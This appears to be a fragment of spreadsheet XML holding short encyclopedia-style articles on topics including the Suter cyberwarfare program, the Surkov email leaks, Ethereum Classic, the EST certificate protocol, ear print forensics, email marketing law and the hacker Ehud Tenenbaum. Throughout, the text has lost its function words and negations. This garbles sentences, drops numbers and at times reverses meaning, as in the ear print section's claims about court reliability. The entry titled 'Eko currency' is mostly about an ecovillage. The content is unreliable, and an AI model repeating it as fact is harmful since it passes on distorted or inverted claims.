    <t>suter military computer program developed systems attacks computer networks communications systems belonging enemy. development program managed safari, secret unit united states force. specialised interfere computers integrated defence systems. suter integrated unmanned aircraft communications.three generations suter developed. suter allows operators monitor enemy radar operators see. suter lets take control enemy's networks direct sensors. suter tested summer 2006, enables invasion links time-critical targets battlefield ballistic missile launchers mobile surface-to-air missile launchers. program tested aircraft ec-130, rc-135, f-16cj. used iraq afghanistan since 2006.u.s. force officials speculated technology similar suter used israeli force thwart syrian radars sneak airspace undetected operation orchard september 2007. evasion defence radar otherwise unlikely f-15s f-16s used equipped stealth technology. references</t>
  </si>
  <si>
    <t>Surkov leaks</t>
  </si>
  <si>
    <t>october 2016, ukrainian hacker group cyberhunta leaked gigabyte emails documents alleged belong russian political operative senior kremlin official vladislav surkov. known russia's "grey cardinal", surkov served political adviser president vladimir putin conflict eastern ukraine architect russia's ideology sovereign democracy.the document leak included 2,300 emails surkov's inbox. emails illustrate russian plans politically upset ukraine coordination affairs major opposition leaders separatist east ukraine. release included document sent surkov denis pushilin, former chairman people's council donetsk people's republic, listing casualties occurred 2014. also included 22-page outline plan support nationalist separatist politicians encourage early parliamentary elections ukraine, undermining government kyiv."the kremlin said leaked documents fake. authenticity washington think tank atlantic council's digital forensic research conducted analysis emails. they determined genuine, based partially routing information. russian entrepreneur yevgeny chichvarkin confirmed emails document dump authentic, saying "yes, original text." russian journalist svetlana babaeva also verified three emails leak genuine.kremlin press secretary dmitry peskov suggested emails belong surkov, saying "does email." oleksandr tkachuk security service ukraine stated managed "authenticate number documents release" could confirm authenticity entire batch documents. publication leaked correspondence obtained alliance hacktivists calling ukrainian cyber alliance. they secured release thousands emails documents microsoft outlook data file. which analyzed second group, inform napalm, open-source journalistic investigative group, finally published online three batches.the first batches, known 'the surkov leaks' published internet october november 2016, included correspondence surkov's office email account. third batch published november 2017, contained correspondence surkov's first deputy, inal ardzinba kharkiv communist party leader alla aleksandrovska. material made available september 2013 november 2014, russia pursuing 'novorossiya' project. inform napalm reported hackers also possession documents 2015 2016 analysed intelligence agencies released operational value.new batches emails leak published november 2017 april 2018. contents document leak microsoft outlook data file (.pst) included 2,337 emails inbox surkov's prm_surkova@gov.ru. released material covers period september 2013 november 2014. email address appears office account surkov's aides, including "masha" "yevgenia". among documents scans surkov's family's passports. while vast majority emails comprise routine briefings schedules, small handful geopolitical significance potentially incriminating. these emails illustrate russian plans politically destabilize ukraine coordination affairs major opposition leaders separatist east ukraine.an email sent surkov others june 2014 denis pushilin, former chairman people's council donetsk people's republic, contains document listing casualties occurred june 2014. list casualties includes unnamed soldier listed "vdv pskovsky" ("вдв псковский"), designation deployment russian airborne troops (vdv) city pskov. paratroopers based pskov thought among first russia's covert casualties ukraine 2014. pskov-based 76th guards assault division awarded order suvorov putin unspecified tasks august 2014.an email sent surkov russian government account june 2014 detailed practicalities russia absorbing portion ukraine. email attachment included briefing paper titled risks economic blockade dnr". paper noted donbass electrical supply comes power plants zaporizhzhya. document includes suggestions supplement electrical supply donbass power rostov nuclear power plant russia. document's author also suggested increasing iron shipments connecting donbass voronezh oblast electricity grid.one emails surkov konstantin malofeev contained list recommended candidates positions separatist government prior appointments.the documents also included spreadsheet containing budget newspaper donetsk.on august 2014, russian official forwarded email surkov russian reporter editor vitaly leybin. email bore title "corrections text" concerned letter ukrainian government "public representatives donbass." nearly identical article, purportedly citizens living ukraine, appeared russian reporter days later minor changes. within week, letter appeared russia today russian websites.one documents included leak 22-page outline plan support nationalist separatist politicians encourage early parliamentary elections ukraine, undermining government kyiv." also glazyev tapes russian-ukrainian cyberwarfare references external links surkov leaks twitter surkov leaks inform napalm</t>
  </si>
  <si>
    <t>Estcoin</t>
  </si>
  <si>
    <t>estcoin mooted national cryptocurrency, devised government estonia august 2017. june 2018, amid criticism banking authorities, estcoin's plans revised longer value euro, national cryptocurrency, estonia would plan “explore various possibilities” blockchain technology. restricted individuals within estonia e-residency program, cannot exchanged freely thus technically qualify cryptocurrency.in 2018, estonian government said planning launch national cryptocurrency never planned also e-residency estonia estonia references</t>
  </si>
  <si>
    <t>EtherRock</t>
  </si>
  <si>
    <t>etherrock also called ethrock early ethereum based non-fungible token (nft) project 2017 depicts various-colored rocks. there etherrocks. background december 2017, etherrocks produced smart contract, using artwork taken clipart website, published ethereum blockchain. only rocks sold first three years project's existence.in early weeks august 2021, gary vaynerchuk tweeted etherrock price spiked much $300,000 became lowest available price nfts. justin reported bought etherrock $500,000.prices continued rise thereafter. late august early september 2021, etherrocks sold 2,268,832 (599 ether), $2,607,584 (790 ether) $2,872,733 (888 ether). another etherrock sold $1,929,060 (420 ether). highest price date $3,765,261 (900 ether) achieved october 2021.in march 2022, collector name "dino dealer" claimed accidentally listed ethrock ($0.0012 usd) instead ($1.2m usd), said immediately sniped bot. relisted $600,000. also rare pepe cryptopunks bored references external links etherrock website etherrock smart contract</t>
  </si>
  <si>
    <t>Supplemental access control</t>
  </si>
  <si>
    <t>supplemental access control (sac) security features defined icao protecting data contained electronic travel documents (e.g. electronic passports). specifies password authenticated connection establishment (pace) protocol, supplements improves upon basic access control (bac) protocol also established icao. pace, like bac, prevents types attacks: skimming (online attack consists reading rfid chip without physical access document without holder's approval). prior reading chip, inspection system needs know data printed document (e.g. mrz) known holder (personal identification number (pin)), means willingly handed document inspection. while works mrz, pace allows using card access numbers (short keys printed document) pins. eavesdropping (offline attack starts recording data exchanged reader chip, analyzed later). inspection system uses pace establishing secure communication channel contactless chip, using stronger cryptography bac. pace offers excellent protection offline attacks, raising security documents containing contactless chips level documents using contact chips.with implementation pace begins third generation electronic passports. members must implement pace electronic passports 2014. states, sake global interoperability, must implement pace without implementing bac, inspection systems implement pace supported mrtd chip. thus, important global interoperability achieved, make enhancement reliable document verification process. achieve interoperability, called interoperability tests. results last test focusing describe current state implementation field. version (april 2014) icao's "supplemental access control" technical report introduces chip authentication protocol alternative active authentication integrates pace, achieving protocol (chip authentication mapping, pace-cam allows faster execution separate protocols. references</t>
  </si>
  <si>
    <t>Ethereum Classic</t>
  </si>
  <si>
    <t>ethereum classic open source, blockchain-based distributed computing platform featuring smart contract (scripting) functionality. supports modified version nakamoto consensus transaction-based state transitions executed public ethereum virtual machine (evm). ethereum classic maintains original, unaltered history ethereum network. ethereum project's mainnet initially released frontier july 2015. however, hack third-party project, ethereum foundation created version ethereum mainnet july 2016 irregular state change implemented erased theft ethereum blockchain history. ethereum foundation applied trademark new, altered version ethereum blockchain; ethereum (code: eth). older, unaltered version ethereum renamed continued ethereum classic (code: etc).ethereum classic's native ether token cryptocurrency traded digital currency exchanges currency code etc. ether created reward network nodes process known "mining", validates computations performed ethereum classic's evm. implemented december 2017, current monetary policy seeks goals bitcoin mechanical, algorithmic, capped. exchanged network transaction fees assets, commodities, currencies, products, services. ethereum classic provides decentralized turing-complete virtual machine, ethereum virtual machine (evm), execute scripts using international network public nodes. virtual machine's instruction turing-complete contrast others like bitcoin script. gas, internal transaction pricing mechanism, used mitigate spam allocate resources network. milestones frontier several codenamed prototypes ethereum platform developed ethereum foundation, part proof-of-concept series, prior official launch frontier network. ethereum classic followed codebase incident. bailout july 2016, result exploitation flaw project's smart contract software, subsequent theft million worth ether, ethereum network split separate blockchains altered history named ethereum (eth) unaltered history named ethereum classic (etc). chain altered history branded ethereum (code: eth) bip-44 coin index chain attributed trademark-owning ethereum foundation. chain, history theft erased ethereum blockchain. some members ethereum community ignored change continued participate original ethereum network. non-fork chain unaltered history continued ethereum classic (code: etc) bip-44 coin index chain security vulnerabilities disclosed 2016, paper released detailing security vulnerabilities could allow ether stolen. june 2016, peter vessenes publicly disclosed existence critical security vulnerability overlooked many solidity contracts, recursive call bug. june 2016, stephan tual publicly claimed funds safe despite newly-discovered critical security flaw. carbon vote july 2016, short notice on-chain vote held hard fork. 82,054,716 existence, 4,542,416 voted, total voter turn 5.5% total supply july 2016; 3,964,516 (87%) voted favor, came single address, 577,899 (13%) opposed fork. expedited process carbon vote drew criticism opponents fork. proponents fork quick market vote effective consensus mechanism, pushing forward fork four days later. block 1,920,000 first ethereum classic block included forked ethereum chain block number 1,920,000, generated ethereum classic miners july 2016. defuse difficulty bomb mechanism called "difficulty bomb" designed push ethereum chain proof-of-work consensus mechanism proof-of-stake future exponentially increasing difficulty mining. this difficulty bomb added network block 200,000 upgrade named "ice age". while ethereum classic participants debated merits difficulty bomb, network upgrade called "die hard" block 3,000,000 delayed effects mechanism. once network participants came consensus issue, ethereum classic upgraded network block 5,900,000 permanently defuse difficulty bomb. this abandoned future proof-of-stake committed network proof-of-work consensus mechanism. protocol parity attempt modernize ethereum classic protocol, several protocol upgrades scheduled activate features ethereum network already enabled past years. atlantis, activated september 2019, enabled outstanding byzantium changes, agharta, january 2020, brought ethereum's constantinople patches, phoenix finally achieved protocol parity ethereum classic ethereum introduction istanbul protocol upgrade. since phoenix protocol activated, applications fully cross-compatible ethereum classic ethereum foundation networks. mining algorithm after series attacks ethereum classic network 2020, change underlying ethash mining algorithm considered community prevent minority proof-of-work chain ethash mining algorithm ethereum dominating hashrate. after evaluating various options monero's randomx standardized sha-3-256, eventually decided double ethash epoch duration 30,000 60,000 order reduce size prevent ethash miners easily switch ethereum classic. this modified ethash also referred etchash thanos upgrade. characteristics cryptocurrencies, validity ether provided blockchain, continuously growing list records, called "blocks", linked secured using cryptography. design, blockchain inherently resistant modification data. open, distributed ledger records transactions parties efficiently verifiable permanent way. unlike bitcoin, ethereum classic operates using accounts balances manner called state transitions. this rely upon unspent transaction outputs (utxos). state denotes current balances accounts extra data. state stored blockchain, stored separate merkle patricia tree. cryptocurrency wallet stores public private "keys" "addresses" used receive spend ether. these generated style mnemonics wallet". ethereum tech stack, unnecessary operate utxo scheme. with private key, possible write blockchain, effectively making ether transaction. send ether account, keccak-256 hash public account needed. ether accounts pseudonymous linked individual persons, rather specific addresses. ether fundamental token operation ethereum classic, thereby provides public distributed ledger transactions. used gas, unit computation used transactions state transitions. within context ethereum classic might called ether, confused eth, also called ether. listed currency code traded cryptocurrency exchanges, greek uppercase character generally used currency symbol. also used transaction fees computational services ethereum classic network. addresses ethereum classic addresses composed prefix "0x", common identifier hexadecimal, concatenated rightmost bytes keccak-256 hash (big endian) ecdsa public (the curve used so-called secp256k1, bitcoin). hexadecimal, digits represent byte, meaning addresses contain hexadecimal digits. example ethereum classic address 0xb794f5ea0ba39494ce839613fffba74279579268. contract addresses format, however, determined sender creation transaction nonce. user accounts indistinguishable contract accounts given address blockchain data. valid keccak-256 hash described format valid, even correspond account private contract. this unlike bitcoin, uses base58check ensure addresses properly typed. monetary policy december 2017, total supply ether ethereum classic hard capped 210,700,000 gotham hard fork upgrade. this added bitcoin-inspired deflationary emission schedule documented ethereum classic improvement proposal (ecip) 1017. emission schedule, also known "5m20", reduces block reward every 5,000,000 blocks. socially, block reward reduction event taken moniker "the fifthening." code people continued ethereum classic advocate blockchain immutability, concept "code law" pro-fork side (ethereum) largely argued extra-protocol intentionality, decentralized decision-making, conflict resolution. attacks thedao fork replay attacks july 2016, reliance clients, fork created replay attack transaction broadcast networks. january 2017, ethereum classic network updated resolve transaction replay attacks. networks officially operating separately. sells stolen august 2016, proponent robin hood group transferred million stolen poloniex attempt sell advice bitly successfully converted currencies, frozen poloniex. august 2016, poloniex returned funds rhg. they refund contract network. classic ether wallet website attack june 2017, ethereum classic twitter account made public statement indicating reason believe website classic ether wallet compromised. ethereum classic twitter account confirmed details released threatpost. ethereum classic team worked cloudflare place warning compromised domain warning users phishing attack. double spend attacks january 2019, ethereum classic subject double-spending attacks. from july august 2020, ethereum classic suffered attacks. references external links ethereumclassic.org</t>
  </si>
  <si>
    <t>Enrollment over Secure Transport</t>
  </si>
  <si>
    <t>enrollment secure transport, cryptographic protocol describes x.509 certificate management protocol targeting public infrastructure (pki) clients need acquire client certificates associated certificate authority (ca) certificates. described 7030. forward replacement scep, easier implement devices already https stack. uses https transport leverages many security attributes. described standardized urls uses well-known uniform resource identifiers (uris) definition codified 5785. operations following operations: usage example basic functions designed easy although rest api, used rest-like manner using simple tools openssl curl. simple command make initial enrollment pre-generated pkcs#10 certificate signing request (stored device.b64), using authentication mechanisms (username:password) specified curl --cacert managementca.cacert.pem --user username:password --data @device.b64 device-p7.b64 "content-type: application/pkcs10" "content-transfer-encoding: base64" https://hostname.tld/.well-known/est/simpleenroll issued certificate, returned base64 encoded pkcs#7 message, stored device-p7.b64. also certificate management protocol (cmp) certificate management (cmc) simple certificate enrollment protocol (scep) automated certificate management environment (acme) references 7030, official specification implementations library libest client server implementation est. bouncy castle offers library java. ejbca, software, implements subset functions. entrust pkis support functions</t>
  </si>
  <si>
    <t>Ear print analysis</t>
  </si>
  <si>
    <t>print analysis used means forensic identification intended identification tool similar fingerprinting. print two-dimensional reproduction parts outer touched specific surface (most commonly helix, antihelix, tragus antitragus). prints identification first discovered fritz hirschi 1965. fritz hirschi first identify criminal switzerland 1965 print analysis also successfully used solve crimes netherlands. addition identification, height imprint crime scene also provide investigators information regarding stature perpetrator.in 2002–2005 forensic identification (fearid) research project commenced analyse print evidence criminal investigations. research project sponsored european union study effectiveness prints used evidence criminal investigations. project used prints 1229 donors. european commission currently trying create database worldwide standard print analysis.the reasoning behind limited print analysis modern forensics complex nature collection analysis methods. there success print analysis collection methods prints complexity proving print matches specific makes identification method unreliable. history fritz hirschi, bern, switzerland, first people prints identification, 1965. hirschi analysed earmarks scene burglary bienne, switzerland. earmarks used observe connection recent burglary arrested. prints taken compare previous marks left first burglary. hirschi discovered suspects print significantly similar mark first burglary, convincing hirschi involved recent burglary. evidence creation print identification system (similar fingerprint identification system) developed university leicester professor rutty along private forensics company. team presented work american academy forensic sciences dallas. rutty measured observed physical elements differences external auditory canal, females shorter canals males. discoveries professor rutty physical variations human opened field identification methods using prints.ear prints used criminal cases identification holland, judicial cases. print databases common spain, history criminal sentences using prints evidence. fearid project forensic identification (fearid) research project commenced 2002 analyse print evidence criminal investigations. project sponsored european union composed nine institutes united kingdom, italy netherlands. methods collection project used 1229 donors donated three left right prints. prints collected using controlled methods. donors pressed glass plate instructed listen sound. then print lifted black filter. research project aimed standardise method print collection accurately depict print leave crime scene. analysis print included details shape, size, darwinian tubercles, creases, moles, piercings scars. limitations discovered project methodology used fearid project donors press glass plate depict print scene valid forensic investigations today. this inability control force suspects place glass. suspects cooperate, prints representative reality. limitations print analysis print analysis used valid reliable method identification lack scientific research. present forensic analysis commonly uses testing methods reliable valid court. factors affecting analysis print analysis greatly affected certain factors: long suspect's contact surface, applied force smudging sliding occurring surface quality surface (glass metal greater potential detailed prints) secretion oils waxes environment factors (weather, period time since print left lifted) method print lifting (using different materials instead fearid black lifters) storage information (software used loss details prints transferred digital formthese factors outline difficulties creating specific methods extract analyse prints. each factor affects reliability validity print. additionally, variety prints made factors uniqueness print. court there lack jurisprudence, doctrinal studies studies relating comparative significance prints forensic investigations. prints accepted reliable evidence court cases. court cases, definitions used define evidence prints completely assertive. wording "there 'high probability' print made suspect" used. subjectivity identification print matching suspect's mark based assessment forensic specialist. match print mark value court based forensic examiners judgement. prints court common factors subjectivity value given print forensic examiner's experience. notable cases notable cases print identification failing convict suspects crime include mark dallagher's united kingdom case 1998. dallagher convicted murder foundation print. january 2004, conviction dropped testing found match earmark found scene. future possibilities print analysis needs research scientific method improvement ensure analysis reliable valid. improvements technology, future print analysis used widely criminal investigations possible. there still fundamental questions consider analysing prints. there needs greater understanding print features factors improve intraindividual variation. prints need resemble resembles another ear. subjectivity also accepted scientific experts analyse prints make conclusions. references</t>
  </si>
  <si>
    <t>Email marketing</t>
  </si>
  <si>
    <t>email marketing sending commercial message, typically group people, using email. broadest sense, every email sent potential current customer could considered email marketing. involves using email send advertisements, request business, solicit sales donations. email marketing strategies commonly seek achieve three primary objectives, build loyalty, trust, brand awareness. term usually refers sending email messages purpose enhancing merchant's relationship current previous customers, encouraging customer loyalty repeat business, acquiring customers convincing current customers purchase something immediately, sharing third-party ads. history email marketing evolved rapidly alongside technological growth 21st century. before growth, emails novelties customers, email marketing effective. 1978, gary thuerk digital equipment corporation (dec) sent first mass email approximately potential clients advanced research projects agency network (arpanet). claims resulted million worth sales products, highlighted potential marketing mass emails. however, email marketing developed effective means direct communication, 1990s, users increasingly began referring "spam", began blocking content emails filters blocking programs. effectively communicate message email, marketers develop pushing content user without automatic filters spam removing software. historically, easy measure effectiveness marketing campaigns target markets cannot adequately defined. email marketing carries benefit allowing marketers identify returns investment measure improve efficiency. email marketing allows marketers users' feedback real-time monitor effective campaign achieving market penetration, revealing communication channel's scope. time, however, also means personal nature specific advertising methods, television advertisements, cannot captured. types email marketing carried different types emails: transactional emails transactional emails usually triggered based customer's action company. qualified transactional relationship messages, communications' primary purpose must facilitate, complete, confirm commercial transaction recipient previously agreed enter sender" along narrow definitions transactional messaging. triggered transactional messages include dropped basket messages, password reset emails, purchase order confirmation emails, order status emails, reorder emails, email receipts. primary purpose transactional email convey information regarding action triggered but, high open rates (51.3% compared 36.6% email newsletters), transactional emails opportunity introduce extend email relationship customers subscribers; anticipate answer questions; cross-sell up-sell products services.many email newsletter software vendors offer transactional email support, gives companies ability include promotional messages within body transactional emails. there also software vendors offer specialized transactional email marketing services, include providing targeted personalized transactional email messages running specific marketing campaigns (such customer referral programs). direct emails direct email involves sending email solely communicate promotional message (for example, special offer product catalog). companies usually collect list customer prospect email addresses send direct promotional messages rent list email addresses service companies. comparison traditional mail there advantages disadvantages using email marketing comparison traditional advertising mail. advantages email marketing popular companies several reasons: email marketing significantly cheaper faster traditional mail, mainly email, cost falls recipient. businesses organizations send high volume emails (email service provider) gather information behavior recipients. insights provided consumer response email marketing help businesses organizations understand make consumer behavior. almost half american internet users check send email typical day, emails delivered local time outperforming sent times open click rates. disadvantages mid-2016 email deliverability still issue legitimate marketers. according report, legitimate email servers averaged delivery rate u.s.; percent filtered spam, missing. this lags behind countries: australia delivers 90%, canada 89%, britain 88%, france 84%, germany brazil 79%. companies considering email marketing program must make sure program violate spam laws united states' controlling assault non-solicited pornography marketing (can-spam), european privacy electronic communications regulations 2003, internet service provider's acceptable policy. opt-in email advertising opt-in email advertising, permission marketing, advertising email whereby recipient advertisement consented receive it.a common example permission marketing newsletter sent advertising firm's customers. such newsletters inform customers upcoming events promotions, products. type advertising, company wants send newsletter customers point purchase would like receive newsletter. with foundation opted-in contact information stored database, marketers send promotional materials automatically using autoresponders—known drip marketing. they also segment promotions specific market segments. legal requirements australia australian spam 2003 enforced australian communications media authority, widely known "acma". defines term unsolicited electronic messages, states unsubscribe functions must work commercial messages, gives information. fines range three fines au$110,000 issued virgin blue airlines (2011), tiger airways holdings limited (2012) cellar master wines limited (2013). canada "canada anti-spam law" (casl) went effect july 2014. casl requires explicit implicit opt-in users, maximum fines noncompliance ca$1 million individuals million businesses. european union 2002 european union (eu) introduced directive privacy electronic communications. article directive prohibits personal email addresses marketing purposes. directive establishes opt-in regime, unsolicited emails sent prior agreement recipient; apply business email addresses. directive since incorporated laws member states. covered privacy electronic communications directive) regulations 2003 applies organizations send marketing form electronic communication. gdpr 2018 imposed number requirements companies collect, store process personal data users, impacts email marketers" particular, users' right access information held them; right information deleted request. united states can-spam 2003 passed congress direct response growing number complaints spam emails. congress determined government showing increased interest regulation commercial electronic mail nationally, send commercial emails mislead recipients source content them, recipients emails right decline them. authorizes us$16,000 penalty violation spamming individual recipient. however, spam emailing outright, imposes laws using deceptive marketing methods headings "materially false misleading". addition conditions email marketers must meet terms format, content labeling. result, many commercial email marketers within united states utilize service special software ensure compliance act. variety older systems exist ensure compliance act. comply act's regulation commercial email, services also typically require users authenticate return address include valid physical address, provide one-click unsubscribe feature, prohibit importing lists purchased addresses given valid permission.in addition satisfying legal requirements, email service providers (esps) began help customers establish manage email marketing campaigns. service providers supply email templates general best practices, well methods handling subscriptions cancellations automatically. some esps provide insight assistance deliverability issues major email providers. they also provide statistics pertaining number messages received opened, whether recipients clicked links within messages. can-spam updated regulations including no-fee provision opting out, definition "sender", post office private mail boxes count "valid physical postal address" definition "person". these provisions went effect july 2008. also cauce coalition against unsolicited commercial email customer engagement suppression list email spam unsolicited email marketing references</t>
  </si>
  <si>
    <t>Syndie</t>
  </si>
  <si>
    <t>syndie open-source cross-platform computer application syndicate (re-publish) data (mainly forums) variety anonymous non-anonymous computer networks. syndie capable reaching archives situated following anonymous networks: i2p, tor, freenet. history syndie development since 2003 ties closely network project, considered parent project. following departure lead developer jrandom 2007, work syndie paused, however 2013 active development resumed. concept syndie operates manner similar blogs, newsgroups, forums, content tools; allows authors privately publicly post messages. messages pushed pulled archive servers (other peers choose be), hosted variety anonymous non-anonymous locations. most archive servers http archives hosted inside network, syndie archives freenet well normal internet. each archive control content stored default messages pushed pulled participants. way, every message backed every user, archive down, content pushed different archive pulled users archive. this means even users archives delete message, long person pushable archive, message redistributed every user. users option delete locally stored messages time, local storage consumes certain amount disk space, blacklists users. each user create multiple identities. each identity known forum, users post different forums. each user control forum; example, wish blog permitting people start threads, allowing post comments. technical requirements syndie java application platform java supported; although standard widget toolkit required graphical user interface versions. syndie primarily graphical application, based standard widget toolkit java, (headless) mode. also distributed computing, distributed networking, distributed database development syndie currently overlap. anonymous osiris (serverless portal system) support forum. internet forum references external links official website www.syndie.i2p inside network syndie forum forums syndie infoanarchy.org (web site infoanarchism)</t>
  </si>
  <si>
    <t>Ecosimia</t>
  </si>
  <si>
    <t>ecosimia ecosistema responsabilidad mia), previously known sintral, lets describes alternative economic structure ecuador. developed within fundación educativa pestalozzi alternative school project tumbaco), first sintral-market took place 1992. like letss, ecosimia non-monetary mutual credit system includes record transactions made member. when group members exchange product service, assign transaction numerical value. they inform local bank, enter public records. numerical value purely statistic meaning: debts possible demand equivalent number. transactions regional level agreed directly groups. beginning 2000 economic situation people ecuador became difficult introduction dollar national currency. during crisis, mauricio wild (the co-founder fundación educativa pestalozzi) resolved create decentralized network groups trade country. these groups spread particularly rural areas ecuador. today already ecosimia-groups ecuador, operating provinces. particular case number groups ecuador come together form country-wide trading network. consequence experience, sintral meeting, held april 2006, name sintral changed ecosimia, spanish ecosistema responsabilidad mia," meaning ecosystem responsibility. further reading ecosimías. visiones prácticas diferencia económico scientific work oliver quijano valencia, 2012. teacher schools blog education system based wild's work. swissaid supports ecosimia</t>
  </si>
  <si>
    <t>Edward Hebern</t>
  </si>
  <si>
    <t>edward hugh hebern (april 1869 february 1952) early inventor rotor machines, devices encryption. background edward hugh hebern born streator, illinois april 1869. parents charles rosanna (rosy) hebern. they harris county, texas charles serving guard escort civil war. february 1866 married harris, texas. rosanna fifteen years old. after mustering service 1866, charles wife returned springfield, illinois, june 1866 received final discharge. edward older sister, arizona (zoa) born 1867, younger brothers, daniel boone hebern, born february 1871, william hebern, born april 1875 houston, texas, well younger sister, nellie hebern, born 1874. august 1875, edward hugh three siblings admitted illinois soldiers’ sailors’ home normal, illinois. according soldiers’ home register father listed died 1874 unknown location, admitted soldiers’ home years later. february 1879, youngest hebern child, william, admitted soldiers’ home. months later august 1879, rosanna married archibald thompson bloomington, illinois. june 1881, months 14th birthday, left soldiers’ home. edward discharged soldiers’ home 1883, turning went odin, illinois worked farm. 1885, daniel, nellie, william odin, illinois. married edward clark yrs. old) august 1886 coffey county, kansas. then headed utah. rest children eventually moved madera, beginning eldest boys 1896. daniel boone hebern north fork, california working laborer; brother, edward hugh hebern madera farming. daniel purchased plots land north fork. patent patent 1918, shortly three others patented countries) much thing. they arthur scherbius germany, hugo koch netherlands, arvid damm sweden. hebern started company market hebern rotor machine; employees agnes meyer, left navy washington work hebern california. scherbius designed enigma, koch sold patent scherbius years later, damm's company taken boris hagelin death moved switzerland still existence, crypto september 1922 hebern started construction hebern building harrison street oakland, california. striking two-story structure built accommodate 1,500 workers luxurious office hebern. 1923 stockholders’ report said “one beautiful structures california said building state true gothic architecture throughout.” time completed following year, cost somewhere $380,000 $400,000, company still income. fact, first sale, italian government, still twenty-three months away. eventually hebern would sell twelve early machines navy, pacific steamship company seattle, buyers, ambitious building repossessed. hebern code building still stands today harrison street oakland primarily used oakland’s asian resource center. hebern's implementation idea less secure believed, william friedman found least method attack offered government. hebern's company prosper, promotional efforts questioned, tried convicted fraud. agnes meyer returned washington work navy. friedman went design much secure complex rotor machine army. eventually became sigaba. patents 1096168 1510441 1683072 1861857 2373890 references external links hebern code machines</t>
  </si>
  <si>
    <t>Ehud Tenenbaum</t>
  </si>
  <si>
    <t>ehud "udi" tenenbaum (hebrew: אהוד "אודי" טננבאום; born august 1979), also known analyzer, israeli hacker. biography tenenbaum born hasharon 1979. became famous 1998 arrested hacking computers belonging nasa, pentagon, u.s. force, u.s. navy, knesset, mit, among high-profile organizations. also hacked computers palestinian groups claimed destroyed website hamas. this, tenenbaum installed packet analyzer trojan horse software hacked servers.the then-us deputy defense secretary john hamre stated attack "the organized systematic attack date" military systems. military thought witnessing sophisticated iraqi 'information warfare'. effort stop attack, united states government assembled agents fbi, force office special investigations, nasa, department justice, defense information systems agency, nsa, cia. government worried warning briefings went president united states. investigation, code-named "solar sunrise," eventually snared california teenagers. after arrest, subsequent probe investigators tenenbaum, arrested israeli police given evidence tenenbaum's activities. later, sent agents israel question tenenbaum. before sentenced, tenenbaum served briefly israel defense forces, released soon thereafter involved traffic collision. 2001, tenenbaum pleaded guilty, stating attempting infiltrate computer systems hold secrets rather prove systems flawed. tenenbaum sentenced year half prison, served months following "deri law". after attack, made short minutes training video called, solar sunrise: dawn threat sold part hacker defense course discontinued september 2004.in 2003, freed prison, tenenbaum founded information security company called "2xs".in september 2008, following investigation canadian police secret service, tenenbaum three accomplices arrested montreal. tenenbaum charged counts credit card fraud, approx. us$1.5 million. u.s. investigators suspected tenenbaum part scam, hackers penetrated financial institutions around world steal credit card numbers. they sold numbers people, used perpetrate massive credit card fraud. later extradited united states stand trial, custody marshals year. august 2010, released bond agreeing plead guilty.in july 2012, tenenbaum accepted plea bargain involved cooperation investigation, york district judge edward korman sentenced tenenbaum time already served prison. tenenbaum also ordered $503,000 given three years' probation. references external links radio show solar sunrise youtube showing movie, solar sunrise ‘the analyzer’ pleads guilty million bank-hacking case published wired august 2009</t>
  </si>
  <si>
    <t>Eko currency</t>
  </si>
  <si>
    <t>findhorn ecovillage experimental architectural community project based park, moray, scotland, near village findhorn. project's main demonstrate sustainable development environmental, social, economic terms. work began early 1980s auspices findhorn foundation includes wide diversity organisations activities. numerous different ecological techniques use, project variety awards, including un-habitat best practice designation 1998. independent study concludes residents lowest ecological footprint community measured industrialised world also half average. although project attracted controversy, growing profile environmental issues climate change degree mainstream acceptance ecological ethos. history october 1982 conference ‘building planetary village’ hosted findhorn foundation marked beginning serious attempts intentional community, existed findhorn since 1962 demonstrate human settlement could considered sustainable environmental, social, economic terms.the term 'ecovillage' later came used describe experiments 1995 first international conference ecovillages, ecovillages sustainable communities 21st century, held findhorn.at first almost activities involved, eco-house construction, vestas wind turbine ecological waste water treatment system, undertaken findhorn foundation itself, trading company findhorn directions ltd. however, 1990 onwards growing number independent charities, businesses, small sister communities, independent practitioners community bodies grown significantly extended size diversity ecological projects, listed below. 2005 ecovillage around members centred around park (the main campus southern edge findhorn), also based numerous locations nearby town forres elsewhere moray. project supports approximately jobs findhorn/forres area provides total aggregate economic impact excess million annum highlands scotland whole.on april 2021 major fire destroyed eco-village's community centre main sanctuary; police scotland arrested 49-year-old man. july 2021 joseph clark, community centre manager, admitted setting fire made redundant. eco-projects ecovillages usually rely wide variety approaches minimise ecological footprint. some important used findhorn listed although important bear mind given situation single largest factor likely attitudes residents rather technologies themselves. national scale better researched micro scale, level easy observe countries similar levels wealth quite different footprints. ecological building codes site comprehensive building code buildings required meet. goes beyond current building standards includes features efficient insulation (typically using products made recycled paper), non-toxic organic paints, wood preservatives boarding manufactured without toxic glues resins, roofing natural clay tiles.there wide variety options used including low-energy light bulbs, 'breathing wall' construction allowing controlled exchange water vapour, conservation features, locally sourced materials. shared facilities laundry, kitchens, lounges etc. encouraged, thus avoiding unnecessary duplication.most buildings incorporate design features invite passive solar radiation reduce building heating needs, south-facing windows, conservatories minimal wall openings north walls. sustainably harvested wood provides space heating many homes new, ecovillage company supplies solar panels domestic water heating residential commercial customers. highlands islands community energy company awarded grant mid-2000s installation ground source heating proposed moray arts centre based findhorn.simply build green talbott (1993) based research undertaken findhorn ecovillage. living machine 1995 jonathon porritt opened europe's first living machine (also known eco-restorers park campus. this ecologically engineered waste water treatment system designed treat sewage population people common number systems also provides research educational facility promote technology. constructed assistance european union. invention canadian scientist john todd, tanks containing diverse communities bacteria, algae, micro-organisms, numerous species plants trees, snails, fish living creatures treat water. series tanks, resulting water pure enough returned local water table. plans water irrigation considered implemented date. organic food production significant factors ecovillage's eco-footprint (see below) attitude food production consumption. various smallholdings associated ecovillage contribute community supported agriculture 'box' scheme provides organic produce local area, grown using permaculture techniques. this horticulture '"provides community's fresh food requirements" phoenix community stores, based park, largest retailers organic produce northern scotland. wind park another reason ecological impact settlement presence four vestas wind turbines generate these make park settlement exporters electricity produced renewable resources. first generator installed 1989 three additional v29s installed march 2006. original site caravan park result ecovillage private electricity grid. most generation used on-site surplus exported national grid. currency 2002, local currency village, called eko, started operation. launched ekopia, community’s development trust, accepted almost ecovillage organizations. hygeia foundation supported launch. there roughly £20,000 notes circulation issuing enabled ekopia make interest loans donations support various initiatives including ecological guest facility, wind park (above) local youth project. current issue, launched november 2017, sterling i.e. notes one, five, twenty denominations. ecological footprint study october 2006 preliminary results ecological footprint study findhorn ecovillage undertaken sustainable development research centre millennium institute collaboration stockholm environment institute confirmed ecovillages tread significantly lightly earth conventional communities. study found residents park nearby campus cluny hill college have, average, footprint 2.71 hectares capita, little half national average hectares. comparison comparable figure united states 9.5gha, whilst uzbekistan rated average 'global earthshare' 